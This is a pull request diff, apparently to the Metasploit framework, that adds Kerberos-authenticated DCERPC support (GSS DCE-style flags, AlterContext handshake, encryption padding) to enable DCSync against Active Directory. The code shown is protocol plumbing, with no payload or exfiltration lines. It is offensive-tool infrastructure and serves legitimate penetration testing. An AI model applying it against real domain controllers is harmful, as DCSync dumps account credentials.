### PR TITLE
DCSync using Kerberos

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -467,7 +467,7 @@ GEM
     ruby-progressbar (1.13.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.2.5)
+    ruby_smb (3.2.6)
       bindata
       openssl-ccm
       openssl-cmac

--- a/LICENSE_GEMS
+++ b/LICENSE_GEMS
@@ -169,7 +169,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.5, "New BSD"
+ruby_smb, 3.2.6, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT

--- a/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
@@ -45,7 +45,7 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
   def build_ap_rep(session_key, sequence_number)
     pvno = Rex::Proto::Kerberos::Model::VERSION
     msg_type = Rex::Proto::Kerberos::Model::AP_REP
-    ctime = Time.now.utc 
+    ctime = Time.now.utc
     cusec = ctime&.usec
 
     encrypted_part = Rex::Proto::Kerberos::Model::EncApRepPart.new(
@@ -66,7 +66,7 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
     )
   end
 
-  def auth_provider_complete_handshake(response, options)    
+  def auth_provider_complete_handshake(response, options)
       @kerberos_authenticator.validate_response!(response.auth_value, accept_incomplete: true)
       gss_api = OpenSSL::ASN1.decode(response.auth_value)
       security_blob = ::RubySMB::Gss.asn1dig(gss_api, 0, 2, 0)&.value
@@ -84,9 +84,7 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
           ])
         ], 1, :CONTEXT_SPECIFIC).to_der
 
-      alter_ctx = RubySMB::Dcerpc::Bind.new(options)
-      # Alter context (3rd message) is identical to Bind requests by definition
-      alter_ctx.pdu_header.ptype = RubySMB::Dcerpc::PTypes::ALTER_CONTEXT
+      alter_ctx = RubySMB::Dcerpc::AlterContext.new(options)
       alter_ctx.pdu_header.call_id = @call_id
 
       add_auth_verifier(alter_ctx, wrapped_ap_rep)
@@ -99,7 +97,7 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
         raise RubySMB::Dcerpc::Error::BindError # raise the more context-specific BindError
       end
 
-      self.krb_encryptor = @kerberos_authenticator.get_message_encryptor(ap_rep_enc_part.subkey, 
+      self.krb_encryptor = @kerberos_authenticator.get_message_encryptor(ap_rep_enc_part.subkey,
                                                                                   @client_sequence_number,
                                                                                   server_sequence_number)
       # Set the session key value on the parent class - needed for decrypting attribute values in e.g. DRSR

--- a/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
@@ -107,7 +107,7 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
   end
 
   def get_auth_padding_length(plaintext_len)
-    (4 - (plaintext_len % 4)) % 4
+    (16 - (self.krb_encryptor.calculate_encrypted_length(plaintext_len) % 16)) % 16
   end
 
   attr_accessor :krb_encryptor

--- a/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
@@ -10,6 +10,8 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
     @kerberos_authenticator = kerberos_authenticator
   end
 
+  # Initialize the auth provider using Kerberos
+  # @return Serialized message for initializing the auth provider
   def auth_provider_init
     kerberos_result = @kerberos_authenticator.authenticate
     @application_key = @session_key = kerberos_result[:session_key]
@@ -17,6 +19,9 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
     kerberos_result[:security_blob]
   end
 
+  # Encrypt the value in dcerpc_req, and add a valid signature to the request.
+  # This function modifies the request object in-place, and does not return anything.
+  # @param dcerpc_req [Request] The Request object to be encrypted and signed in-place
   def auth_provider_encrypt_and_sign(dcerpc_req)
     auth_pad_length = get_auth_padding_length(dcerpc_req.stub.to_binary_s.length)
     plain_stub = dcerpc_req.stub.to_binary_s + "\x00" * auth_pad_length
@@ -24,12 +29,20 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
 
     encrypted_stub = emessage[header_length..-1]
     signature = emessage[0,header_length]
-    dcerpc_req.sec_trailer.auth_pad_length = auth_pad_length
     set_encrypted_packet(dcerpc_req, encrypted_stub, auth_pad_length)
     set_signature_on_packet(dcerpc_req, signature)
   end
 
+  # Decrypt the value in dcerpc_response, and validate its signature.
+  # This function modifies the request object in-place, and returns whether the signature was valid.
+  # @param dcerpc_response [Response] The Response packet to decrypt and verify in-place
+  # @raise ArgumentError If the auth type is not SPNEGO (which ultimately wraps Kerberos)
+  # @return [Boolean] Is the packet's signature valid?
   def auth_provider_decrypt_and_verify(dcerpc_response)
+    auth_type = dcerpc_response.sec_trailer.auth_type
+    unless [RubySMB::Dcerpc::RPC_C_AUTHN_GSS_NEGOTIATE].include?(auth_type)
+      raise ArgumentError, "Unsupported Auth Type: #{dcerpc_response.sec_trailer.auth_type}"
+    end
     encrypted_stub = get_response_full_stub(dcerpc_response)
     signature = dcerpc_response.auth_value
     data = signature + encrypted_stub
@@ -40,6 +53,8 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
       return false
     end
     set_decrypted_packet(dcerpc_response, result)
+
+    true
   end
 
   def build_ap_rep(session_key, sequence_number)
@@ -67,41 +82,47 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
   end
 
   def auth_provider_complete_handshake(response, options)
+    begin
       @kerberos_authenticator.validate_response!(response.auth_value, accept_incomplete: true)
       gss_api = OpenSSL::ASN1.decode(response.auth_value)
       security_blob = ::RubySMB::Gss.asn1dig(gss_api, 0, 2, 0)&.value
       ap_rep = Rex::Proto::Kerberos::Model::ApRep.decode(security_blob)
       ap_rep_enc_part = ap_rep.decrypt_enc_part(@session_key.value)
-      server_sequence_number = ap_rep_enc_part.sequence_number
-      # Now complete the handshake - see [MS-KILE] 3.4.5.1 - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/190ab8de-dc42-49cf-bf1b-ea5705b7a087
-      response_ap_rep = build_ap_rep(@session_key, server_sequence_number)
+    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError,
+             ::Rex::Proto::Kerberos::Model::Error::KerberosError,
+             OpenSSL::ASN1::ASN1Error => e
+      raise RubySMB::Dcerpc::Error::BindError, e.message # raise the more context-specific BindError
+    end
+    server_sequence_number = ap_rep_enc_part.sequence_number
+    # Now complete the handshake - see [MS-KILE] 3.4.5.1 - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/190ab8de-dc42-49cf-bf1b-ea5705b7a087
+    response_ap_rep = build_ap_rep(@session_key, server_sequence_number)
 
-      wrapped_ap_rep = OpenSSL::ASN1::ASN1Data.new([
-          OpenSSL::ASN1::Sequence.new([
-            OpenSSL::ASN1::ASN1Data.new([
-              OpenSSL::ASN1::OctetString(response_ap_rep.encode)
-            ], 2, :CONTEXT_SPECIFIC)
-          ])
-        ], 1, :CONTEXT_SPECIFIC).to_der
+    wrapped_ap_rep = OpenSSL::ASN1::ASN1Data.new([
+      OpenSSL::ASN1::Sequence.new([
+        OpenSSL::ASN1::ASN1Data.new([
+          OpenSSL::ASN1::OctetString(response_ap_rep.encode)
+        ], 2, :CONTEXT_SPECIFIC)
+      ])
+    ], 1, :CONTEXT_SPECIFIC).to_der
 
-      alter_ctx = RubySMB::Dcerpc::AlterContext.new(options)
-      alter_ctx.pdu_header.call_id = @call_id
+    alter_ctx = RubySMB::Dcerpc::AlterContext.new(options)
+    alter_ctx.pdu_header.call_id = @call_id
 
-      add_auth_verifier(alter_ctx, wrapped_ap_rep)
+    add_auth_verifier(alter_ctx, wrapped_ap_rep)
 
-      send_packet(alter_ctx)
+    send_packet(alter_ctx)
 
-      begin
-        dcerpc_response = recv_struct(RubySMB::Dcerpc::AlterContextResp)
-      rescue RubySMB::Dcerpc::Error::InvalidPacket
-        raise RubySMB::Dcerpc::Error::BindError # raise the more context-specific BindError
-      end
+    begin
+      dcerpc_response = recv_struct(RubySMB::Dcerpc::AlterContextResp)
+    rescue RubySMB::Dcerpc::Error::InvalidPacket
+      raise RubySMB::Dcerpc::Error::BindError, e.message # raise the more context-specific BindError
+    end
 
-      self.krb_encryptor = @kerberos_authenticator.get_message_encryptor(ap_rep_enc_part.subkey,
-                                                                                  @client_sequence_number,
-                                                                                  server_sequence_number)
-      # Set the session key value on the parent class - needed for decrypting attribute values in e.g. DRSR
-      @session_key = ap_rep_enc_part.subkey.value
+    self.krb_encryptor = @kerberos_authenticator.get_message_encryptor(ap_rep_enc_part.subkey,
+                                                                                @client_sequence_number,
+                                                                                server_sequence_number)
+    # Set the session key value on the parent class - needed for decrypting attribute values in e.g. DRSR
+    @session_key = ap_rep_enc_part.subkey.value
   end
 
   def get_auth_padding_length(plaintext_len)

--- a/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
@@ -67,7 +67,7 @@ module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
   end
 
   def auth_provider_complete_handshake(response, options)    
-      #@kerberos_authenticator.validate_response!(response.auth_value)
+      @kerberos_authenticator.validate_response!(response.auth_value, accept_incomplete: true)
       gss_api = OpenSSL::ASN1.decode(response.auth_value)
       security_blob = ::RubySMB::Gss.asn1dig(gss_api, 0, 2, 0)&.value
       ap_rep = Rex::Proto::Kerberos::Model::ApRep.decode(security_blob)

--- a/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
@@ -1,0 +1,114 @@
+# -*- coding: binary -*-
+
+#
+# This class implements an override for RubySMB's default authentication method to instead
+# use a kerberos authenticator
+#
+module Msf::Exploit::Remote::DCERPC::KerberosAuthentication
+  # @param [Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB] kerberos_authenticator The authenticator to make the required Kerberos requests
+  def kerberos_authenticator=(kerberos_authenticator)
+    @kerberos_authenticator = kerberos_authenticator
+  end
+
+  def auth_provider_init
+    kerberos_result = @kerberos_authenticator.authenticate
+    @application_key = @session_key = kerberos_result[:session_key]
+    @client_sequence_number = kerberos_result[:client_sequence_number]
+    kerberos_result[:security_blob]
+  end
+
+  def auth_provider_encrypt_and_sign(dcerpc_req)
+    auth_pad_length = get_auth_padding_length(dcerpc_req.stub.to_binary_s.length)
+    plain_stub = dcerpc_req.stub.to_binary_s + "\x00" * auth_pad_length
+    emessage, header_length, krb_pad_length = self.krb_encryptor.encrypt_and_increment(plain_stub)
+
+    encrypted_stub = emessage[header_length..-1]
+    signature = emessage[0,header_length]
+    dcerpc_req.sec_trailer.auth_pad_length = auth_pad_length
+    set_encrypted_packet(dcerpc_req, encrypted_stub, auth_pad_length)
+    set_signature_on_packet(dcerpc_req, signature)
+  end
+
+  def auth_provider_decrypt_and_verify(dcerpc_response)
+    encrypted_stub = get_response_full_stub(dcerpc_response)
+    signature = dcerpc_response.auth_value
+    data = signature + encrypted_stub
+
+    begin
+      result = self.krb_encryptor.decrypt_and_verify(data)
+    rescue Rex::Proto::Kerberos::Model::Error::KerberosError
+      return false
+    end
+    set_decrypted_packet(dcerpc_response, result)
+  end
+
+  def build_ap_rep(session_key, sequence_number)
+    pvno = Rex::Proto::Kerberos::Model::VERSION
+    msg_type = Rex::Proto::Kerberos::Model::AP_REP
+    ctime = Time.now.utc 
+    cusec = ctime&.usec
+
+    encrypted_part = Rex::Proto::Kerberos::Model::EncApRepPart.new(
+      ctime: ctime,
+      cusec: cusec,
+      sequence_number: sequence_number,
+      enc_key_usage: Rex::Proto::Kerberos::Crypto::KeyUsage::AP_REP_ENCPART
+    )
+    enc_aprep = Rex::Proto::Kerberos::Model::EncryptedData.new(
+      etype: session_key.type,
+      cipher: encrypted_part.encrypt(session_key.type, session_key.value)
+    )
+
+    Rex::Proto::Kerberos::Model::ApRep.new(
+      pvno: pvno,
+      msg_type: msg_type,
+      enc_part: enc_aprep
+    )
+  end
+
+  def auth_provider_complete_handshake(response, options)    
+      #@kerberos_authenticator.validate_response!(response.auth_value)
+      gss_api = OpenSSL::ASN1.decode(response.auth_value)
+      security_blob = ::RubySMB::Gss.asn1dig(gss_api, 0, 2, 0)&.value
+      ap_rep = Rex::Proto::Kerberos::Model::ApRep.decode(security_blob)
+      ap_rep_enc_part = ap_rep.decrypt_enc_part(@session_key.value)
+      server_sequence_number = ap_rep_enc_part.sequence_number
+      # Now complete the handshake - see [MS-KILE] 3.4.5.1 - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/190ab8de-dc42-49cf-bf1b-ea5705b7a087
+      response_ap_rep = build_ap_rep(@session_key, server_sequence_number)
+
+      wrapped_ap_rep = OpenSSL::ASN1::ASN1Data.new([
+          OpenSSL::ASN1::Sequence.new([
+            OpenSSL::ASN1::ASN1Data.new([
+              OpenSSL::ASN1::OctetString(response_ap_rep.encode)
+            ], 2, :CONTEXT_SPECIFIC)
+          ])
+        ], 1, :CONTEXT_SPECIFIC).to_der
+
+      alter_ctx = RubySMB::Dcerpc::Bind.new(options)
+      # Alter context (3rd message) is identical to Bind requests by definition
+      alter_ctx.pdu_header.ptype = RubySMB::Dcerpc::PTypes::ALTER_CONTEXT
+      alter_ctx.pdu_header.call_id = @call_id
+
+      add_auth_verifier(alter_ctx, wrapped_ap_rep)
+
+      send_packet(alter_ctx)
+
+      begin
+        dcerpc_response = recv_struct(RubySMB::Dcerpc::AlterContextResp)
+      rescue RubySMB::Dcerpc::Error::InvalidPacket
+        raise RubySMB::Dcerpc::Error::BindError # raise the more context-specific BindError
+      end
+
+      self.krb_encryptor = @kerberos_authenticator.get_message_encryptor(ap_rep_enc_part.subkey, 
+                                                                                  @client_sequence_number,
+                                                                                  server_sequence_number)
+      # Set the session key value on the parent class - needed for decrypting attribute values in e.g. DRSR
+      @session_key = ap_rep_enc_part.subkey.value
+  end
+
+  def get_auth_padding_length(plaintext_len)
+    (4 - (plaintext_len % 4)) % 4
+  end
+
+  attr_accessor :krb_encryptor
+end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -69,6 +69,10 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   #   @return [String] whether to send delegated creds (from the set Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base::Delegation)
   attr_reader :send_delegated_creds
 
+  # @!attribute [r] is_dcerpc
+  #   @return [Boolean] Whether this encryptor will be used for DCERPC purposes (since the behaviour is subtly different)
+  attr_reader :is_dcerpc
+
   # @!attribute [r] ticket_storage
   #   @return [Msf::Exploit::Remote::Kerberos::Ticket::Storage::Base] the ticket storage driver
   attr_reader :ticket_storage
@@ -89,12 +93,13 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
                 :workspace
 
   # Flags - https://datatracker.ietf.org/doc/html/rfc4121#section-4.1.1.1
-  GSS_DELEGATE      = 1
-  GSS_MUTUAL        = 2
-  GSS_REPLAY_DETECT = 4
-  GSS_SEQUENCE      = 8
-  GSS_CONFIDENTIAL  = 16
-  GSS_INTEGRITY     = 32
+  GSS_DELEGATE      = 0x01
+  GSS_MUTUAL        = 0x02
+  GSS_REPLAY_DETECT = 0x04
+  GSS_SEQUENCE      = 0x08
+  GSS_CONFIDENTIAL  = 0x10
+  GSS_INTEGRITY     = 0x20
+  GSS_DCE_STYLE     = 0x1000
 
   module Delegation
     ALWAYS = 'always' # Always send delegated creds
@@ -117,6 +122,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       use_gss_checksum: false,
       mechanism: Rex::Proto::Gss::Mechanism::SPNEGO,
       send_delegated_creds: Delegation::ALWAYS,
+      is_dcerpc: false,
       cache_file: nil,
       ticket_storage: nil,
       key: nil,
@@ -138,6 +144,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     @use_gss_checksum = use_gss_checksum
     @mechanism = mechanism
     @send_delegated_creds = send_delegated_creds
+    @is_dcerpc = is_dcerpc
     @ticket_storage = ticket_storage || Msf::Exploit::Remote::Kerberos::Ticket::Storage::ReadWrite.new(
       framework: framework,
       framework_module: framework_module
@@ -247,7 +254,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
                                             client_sequence_number,
                                             server_sequence_number,
                                             is_initiator: true,
-                                            use_acceptor_subkey: true)
+                                            use_acceptor_subkey: true,
+                                            is_dcerpc: @is_dcerpc)
   end
 
   def parse_gss_init_response(token, session_key, mechanism: 'kerberos')
@@ -258,16 +266,17 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       data = encapsulated_token[2, encapsulated_token.length]
       case tok_id
       when TOK_ID_KRB_AP_REP
-        ap_req = Rex::Proto::Kerberos::Model::ApRep.decode(data)
+        ap_rep = Rex::Proto::Kerberos::Model::ApRep.decode(data)
         print_good("#{peer} - Received AP-REQ. Extracting session key...")
 
-        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError, 'Mismatching etypes' if session_key.type != ap_req.enc_part.etype
+        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError, 'Mismatching etypes' if session_key.type != ap_rep.enc_part.etype
 
-        decrypted = ap_req.decrypt_enc_part(session_key.value)
+        decrypted = ap_rep.decrypt_enc_part(session_key.value)
 
         result = {
           ap_rep_subkey: decrypted.subkey,
-          server_sequence_number: decrypted.sequence_number
+          server_sequence_number: decrypted.sequence_number,
+          etype: ap_rep.enc_part.etype
         }
       when TOK_ID_KRB_ERROR
         krb_err = Rex::Proto::Kerberos::Model::KrbError.decode(data)
@@ -616,7 +625,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
     ## Service Authentication
     checksum = nil
-    checksum = build_gss_ap_req_checksum_value(mutual_auth, nil, nil, nil, nil, nil) if use_gss_checksum
+    checksum = build_gss_ap_req_checksum_value(mutual_auth, is_dcerpc, nil, nil, nil, nil, nil) if use_gss_checksum
 
     sequence_number = rand(1 << 32)
     service_ap_request = build_service_ap_request(
@@ -706,6 +715,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     if use_gss_checksum
       checksum = build_gss_ap_req_checksum_value(
         mutual_auth,
+        is_dcerpc,
         delegated_tgs_ticket,
         delegated_tgs_auth,
         tgs_auth.key,
@@ -740,7 +750,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     }
   end
 
-  def build_gss_ap_req_checksum_value(mutual_auth, ticket, decrypted_part, session_key, realm, client_name)
+  def build_gss_ap_req_checksum_value(mutual_auth, is_dcerpc, ticket, decrypted_part, session_key, realm, client_name)
     # @see https://datatracker.ietf.org/doc/html/rfc4121#section-4.1.1
     # No channel binding
     channel_binding_info = "\x00" * 16
@@ -748,6 +758,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
     flags = GSS_REPLAY_DETECT | GSS_SEQUENCE | GSS_CONFIDENTIAL | GSS_INTEGRITY
     flags |= GSS_MUTUAL if mutual_auth
+    flags |= GSS_DCE_STYLE if is_dcerpc
     flags |= GSS_DELEGATE if ticket
 
     flags = [flags].pack('V')

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -69,9 +69,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   #   @return [String] whether to send delegated creds (from the set Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base::Delegation)
   attr_reader :send_delegated_creds
 
-  # @!attribute [r] is_dcerpc
+  # @!attribute [r] dce_style
   #   @return [Boolean] Whether this encryptor will be used for DCERPC purposes (since the behaviour is subtly different)
-  attr_reader :is_dcerpc
+  attr_reader :dce_style
 
   # @!attribute [r] ticket_storage
   #   @return [Msf::Exploit::Remote::Kerberos::Ticket::Storage::Base] the ticket storage driver
@@ -122,7 +122,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       use_gss_checksum: false,
       mechanism: Rex::Proto::Gss::Mechanism::SPNEGO,
       send_delegated_creds: Delegation::ALWAYS,
-      is_dcerpc: false,
+      dce_style: false,
       cache_file: nil,
       ticket_storage: nil,
       key: nil,
@@ -144,7 +144,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     @use_gss_checksum = use_gss_checksum
     @mechanism = mechanism
     @send_delegated_creds = send_delegated_creds
-    @is_dcerpc = is_dcerpc
+    @dce_style = dce_style
     @ticket_storage = ticket_storage || Msf::Exploit::Remote::Kerberos::Ticket::Storage::ReadWrite.new(
       framework: framework,
       framework_module: framework_module
@@ -255,7 +255,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
                                             server_sequence_number,
                                             is_initiator: true,
                                             use_acceptor_subkey: true,
-                                            is_dcerpc: @is_dcerpc)
+                                            dce_style: @dce_style)
   end
 
   def parse_gss_init_response(token, session_key, mechanism: 'kerberos')
@@ -626,7 +626,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
     ## Service Authentication
     checksum = nil
-    checksum = build_gss_ap_req_checksum_value(mutual_auth, is_dcerpc, nil, nil, nil, nil, nil) if use_gss_checksum
+    checksum = build_gss_ap_req_checksum_value(mutual_auth, dce_style, nil, nil, nil, nil, nil) if use_gss_checksum
 
     sequence_number = rand(1 << 32)
     service_ap_request = build_service_ap_request(
@@ -716,7 +716,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     if use_gss_checksum
       checksum = build_gss_ap_req_checksum_value(
         mutual_auth,
-        is_dcerpc,
+        dce_style,
         delegated_tgs_ticket,
         delegated_tgs_auth,
         tgs_auth.key,
@@ -751,7 +751,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     }
   end
 
-  def build_gss_ap_req_checksum_value(mutual_auth, is_dcerpc, ticket, decrypted_part, session_key, realm, client_name)
+  def build_gss_ap_req_checksum_value(mutual_auth, dce_style, ticket, decrypted_part, session_key, realm, client_name)
     # @see https://datatracker.ietf.org/doc/html/rfc4121#section-4.1.1
     # No channel binding
     channel_binding_info = "\x00" * 16
@@ -759,7 +759,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
     flags = GSS_REPLAY_DETECT | GSS_SEQUENCE | GSS_CONFIDENTIAL | GSS_INTEGRITY
     flags |= GSS_MUTUAL if mutual_auth
-    flags |= GSS_DCE_STYLE if is_dcerpc
+    flags |= GSS_DCE_STYLE if dce_style
     flags |= GSS_DELEGATE if ticket
 
     flags = [flags].pack('V')

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -294,11 +294,16 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
   # @param security_blob [String] SPNEGO GSS Blob
   # @param accept_incomplete [Boolean] Whether an Incomplete value is an acceptable response
-  # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if the response was not successful
+  # @raise [Rex::Proto::Kerberos::Model::Error::KerberosError] if the response was not successful
+  # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if the response was invalid per the Kerberos/GSS protocol
   def validate_response!(security_blob, accept_incomplete: false)
-    gss_api = OpenSSL::ASN1.decode(security_blob)
-    neg_result = ::RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value.to_i
-    supported_neg = ::RubySMB::Gss.asn1dig(gss_api, 0, 1, 0)&.value
+    begin
+      gss_api = OpenSSL::ASN1.decode(security_blob)
+      neg_result = ::RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value.to_i
+      supported_neg = ::RubySMB::Gss.asn1dig(gss_api, 0, 1, 0)&.value
+    rescue OpenSSL::ASN1::ASN1Error
+      raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError.new('Invalid GSS Response')
+    end
 
     is_success = (neg_result == NEG_TOKEN_ACCEPT_COMPLETED || (accept_incomplete && neg_result == NEG_TOKEN_ACCEPT_INCOMPLETE)) &&
       supported_neg == ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -293,13 +293,14 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   end
 
   # @param security_blob [String] SPNEGO GSS Blob
+  # @param accept_incomplete [Boolean] Whether an Incomplete value is an acceptable response
   # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if the response was not successful
-  def validate_response!(security_blob)
+  def validate_response!(security_blob, accept_incomplete: false)
     gss_api = OpenSSL::ASN1.decode(security_blob)
     neg_result = ::RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value.to_i
     supported_neg = ::RubySMB::Gss.asn1dig(gss_api, 0, 1, 0)&.value
 
-    is_success = neg_result == NEG_TOKEN_ACCEPT_COMPLETED &&
+    is_success = (neg_result == NEG_TOKEN_ACCEPT_COMPLETED || (accept_incomplete && neg_result == NEG_TOKEN_ACCEPT_INCOMPLETE)) &&
       supported_neg == ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value
 
     raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new('Failed to negotiate Kerberos GSS') unless is_success

--- a/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
@@ -13,9 +13,13 @@ module Msf::Exploit::Remote::SMB::Client::KerberosAuthentication
   def authenticate
     raise ::RubySMB::Error::AuthenticationFailure, "Missing negotiation security buffer" if negotiation_security_buffer.nil?
 
-    gss_api = OpenSSL::ASN1.decode(negotiation_security_buffer)
-    mech_types = RubySMB::Gss.asn1dig(gss_api, 1, 0, 0, 0)&.value || []
-    has_kerberos_gss_mech_type = mech_types&.any? { |mech_type| mech_type.value == ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value }
+    begin
+      gss_api = OpenSSL::ASN1.decode(negotiation_security_buffer)
+      mech_types = RubySMB::Gss.asn1dig(gss_api, 1, 0, 0, 0)&.value || []
+      has_kerberos_gss_mech_type = mech_types&.any? { |mech_type| mech_type.value == ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value }
+    rescue OpenSSL::ASN1::ASN1Error
+      raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError.new('Invalid GSS Response')
+    end
 
     error = "Unable to negotiate kerberos with the remote host. Expected oid #{::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value} in #{mech_types.map(&:value).inspect}"
     raise ::RubySMB::Error::AuthenticationFailure, error unless has_kerberos_gss_mech_type

--- a/lib/rex/proto/gss/kerberos/message_encryptor.rb
+++ b/lib/rex/proto/gss/kerberos/message_encryptor.rb
@@ -45,6 +45,10 @@ module Rex
             result
           end
 
+          def calculate_encrypted_length(plaintext_len)
+            encryptor.calculate_encrypted_length(plaintext_len)
+          end
+
           #
           # The sequence number to use when we are encrypting, which should be incremented for each message
           #

--- a/lib/rex/proto/gss/kerberos/message_encryptor.rb
+++ b/lib/rex/proto/gss/kerberos/message_encryptor.rb
@@ -14,13 +14,14 @@ module Rex
           # @param [Integer] decrypt_sequence_number The starting sequence number we expect to see when we decrypt messages
           # @param [Boolean] is_initiator Are we the initiator in this communication (used for setting flags and key usage values)
           # @param [Boolean] use_acceptor_subkey Are we using the subkey provided by the acceptor? (used for setting appropriate flags)
-          def initialize(key, encrypt_sequence_number, decrypt_sequence_number, is_initiator: true, use_acceptor_subkey: true, is_dcerpc: false)
+          # @param [Boolean] dce_style Is the format of the encrypted blob DCE-style?
+          def initialize(key, encrypt_sequence_number, decrypt_sequence_number, is_initiator: true, use_acceptor_subkey: true, dce_style: false)
             @key = key
             @encrypt_sequence_number = encrypt_sequence_number
             @decrypt_sequence_number = decrypt_sequence_number
             @is_initiator = is_initiator
             @use_acceptor_subkey = use_acceptor_subkey
-            @is_dcerpc = is_dcerpc
+            @dce_style = dce_style
             @encryptor = Rex::Proto::Kerberos::Crypto::Encryption::from_etype(key.type)
           end
   
@@ -29,7 +30,7 @@ module Rex
           # @return [String, Integer, Integer] The encrypted data, the length of its header, and the length of padding added to it prior to encryption
           #
           def encrypt_and_increment(data)
-            result = encryptor.gss_wrap(data, @key, @encrypt_sequence_number, @is_initiator, use_acceptor_subkey: @use_acceptor_subkey, is_dcerpc: @is_dcerpc)
+            result = encryptor.gss_wrap(data, @key, @encrypt_sequence_number, @is_initiator, use_acceptor_subkey: @use_acceptor_subkey, dce_style: @dce_style)
             @encrypt_sequence_number += 1  
             
             result
@@ -82,7 +83,7 @@ module Rex
           #
           # "For [MS-RPCE], the length field in the above pseudo ASN.1 header does not include the length of the concatenated data if [RFC1964] is used."
           #
-          attr_accessor :is_dcerpc
+          attr_accessor :dce_style
 
           #
           # [Rex::Proto::Kerberos::Crypto::*] Encryption class for encrypting/decrypting messages

--- a/lib/rex/proto/kerberos/crypto/block_cipher_base.rb
+++ b/lib/rex/proto/kerberos/crypto/block_cipher_base.rb
@@ -98,6 +98,10 @@ module Rex
             raise NotImplementedError
           end
 
+          def calculate_encrypted_length(plaintext_len)
+            raise NotImplementedError
+          end
+
           private
 
